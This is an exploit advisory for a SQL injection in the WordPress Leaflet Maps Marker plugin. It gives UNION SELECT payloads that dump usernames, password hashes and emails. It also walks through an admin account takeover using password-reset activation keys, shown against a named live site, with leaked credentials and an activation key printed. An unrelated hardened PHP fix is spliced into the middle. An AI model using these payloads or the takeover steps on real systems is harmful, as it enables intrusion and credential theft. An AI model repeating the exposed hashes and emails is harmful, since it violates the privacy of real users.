########################################
# Exploit Title: WordPress leaflet maps marker plugin SQL Injection Vulnerability #
# Author: neo.hapsis # member of Hackyard Security Group
# E-mail: neo.hapsis[dot]hackyard.net / internet.security[dot]vodafone.it #
# Web Site : neohapsis.com | #
# Category:: webapps #
# Google Dork: NA #
# platform : php #
# Vendor: http://www.mapsmarker.com/ #
# Version: 1.x.x #
# Tested on: linux #
# Security Risk : High #
########################################
1)Introduction
2)Vulnerability Description
3)Exploit
1)Introduction
The WordPress plugin Leaflet Maps Marker allows you to pin, organize & show your favorite places
through OpenStreetMap on your blog and via different APIs on external websites or apps
2)Vulnerability Description
You can inject SQL queries/commands as input, typically via web pages. Many web pages take parameters from
the web user and build a SQL query to the database from them.
Take, for instance, a user login: the web page receives the user name and password and issues a SQL query to the
database to check whether a user with that name and password exists.
With SQL injection, it is possible for us to send a crafted user name and/or password field that changes
the SQL query and thus grants us something else.
3)Exploit
[~] P0c [~] :
=================================================================
Vuln file in :
http://Localhost/{Path}/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php
[~] Vuln Code [~] :
-----------------------------------------------------------------------------------------------------------------------------------
elseif (isset($_GET['marker'])) {
    $markerid = mysql_real_escape_string($_GET['marker']);
    $uid = substr(md5(rand()), 0, 8);
    $pname = 'pa'.$uid;
    $table_name_markers = $wpdb->prefix.'leafletmapsmarker_markers';
    $row = $wpdb->get_row("SELECT id,markername,basemap,layer,lat,lon,icon,popuptext,zoom,
        openpopup,mapwidth,mapwidthunit,mapheight,panel,controlbox,overlays_custom,overlays_custom2,
        overlays_custom3,overlays_custom4,wms,wms2,wms3,wms4,wms5,wms6,wms7,wms8,wms9,wms10
        FROM ".$table_name_markers." WHERE id=".$markerid, ARRAY_A);
    if(!empty($row)) {
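The root cause in the snippet above is that `marker` is concatenated into a numeric context (`WHERE id=...`) without quotes, so `mysql_real_escape_string()` (which only escapes quote and backslash characters) cannot stop a value like `-1 UNION SELECT ...` from changing the statement. The hardened handler below is an added example, not the plugin's own code: it validates the parameter as a positive integer and binds it through `$wpdb->prepare()` with `%d`. The function name `lmm_get_marker_row` and the wrapping of the lookup in a function are assumptions made for illustration.

```php
<?php
// Added example (not the plugin's own code): hardened replacement for the
// leaflet-fullscreen.php marker lookup. Assumes the WordPress globals and
// helpers ($wpdb, absint(), wp_die()) are available as in any plugin file.

function lmm_get_marker_row( $wpdb, $raw_marker ) {
    // id is an integer column: reject anything that is not a string of
    // digits before it gets anywhere near the query.
    if ( ! is_string( $raw_marker ) || ! ctype_digit( $raw_marker ) ) {
        return null;
    }
    $markerid = absint( $raw_marker );
    if ( 0 === $markerid ) {
        return null;
    }

    // Table names cannot be bound as placeholders; the prefix comes from
    // configuration, not from the request, so interpolating it is safe.
    $table_name_markers = $wpdb->prefix . 'leafletmapsmarker_markers';

    // $wpdb->prepare() binds the value; %d casts to an integer, so the
    // shape of the statement can no longer be altered by the caller.
    $sql = $wpdb->prepare(
        "SELECT id,markername,basemap,layer,lat,lon,icon,popuptext,zoom,
                openpopup,mapwidth,mapwidthunit,mapheight,panel,controlbox,
                overlays_custom,overlays_custom2,overlays_custom3,overlays_custom4,
                wms,wms2,wms3,wms4,wms5,wms6,wms7,wms8,wms9,wms10
         FROM {$table_name_markers} WHERE id = %d",
        $markerid
    );
    return $wpdb->get_row( $sql, ARRAY_A );
}

if ( isset( $_GET['marker'] ) ) {
    $row = lmm_get_marker_row( $wpdb, $_GET['marker'] );
    if ( empty( $row ) ) {
        // Unknown or malformed id: fail closed instead of rendering anything.
        wp_die( 'Marker not found', '', array( 'response' => 404 ) );
    }
}
```

Two independent layers are used deliberately: the `ctype_digit()`/`absint()` check rejects malformed input early and gives a clean 404, while `prepare()` guarantees the query is safe even if a future caller forgets the validation. Either one alone would close the injection shown on this page; together they also make the intent obvious to the next reviewer.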
[~] D3m0 [~] :
http://www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 [Inj3ct Here]
Code:
Union Select 1,(select(@) from (select (@:=000),(select (@) from (wp_users) where (@) in (@:=concat
(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29
A USEFUL TRICK
Extracting user_activation_key via the injection lets us set a new password.
WordPress password hashes are difficult to crack,
so here is an easy way to log into the admin panel.
First we go to the admin panel and press / Lost your password? \
Now we enter the admin user found by the injection and request a password reset, which generates the activation key.
The activation key is stored in the SQL database in table wp_users, column user_activation_key.
Now extract the user_login and user_activation_key.
Code:
http://www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,
5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29 FROM wp_users
Now substitute the extracted data:
http://www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login
And set the new password!
Demo of the injection
http://brighterdayproject.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1
Union Select 1,(select(@) from (select (@:=000),(select (@) from (wp_users) where (@) in (@:=concat
(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29
Viewed in the page source:
JayM80:$P$BQGIrXW2vvfVmRZYbvt6IN56MenEAx/:jay@jasonlarche.com
MigerIo3:$P$BvEmL2ZeNTzllduuqR2HkhPmQeQfuX0:pongokongo@gmail.com
Using the SQL injection to extract data on
http://brighterdayproject.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1
UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,
18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users
In the source we can see:
JayM80:EHn9LQ7oZ3dhHUwuf63D
Build the login URL with the activation key extracted from the users table:
wp-login.php?action=rp&key=EHn9LQ7oZ3dhHUwuf63D&login=JayM80
By Neo.hapsis !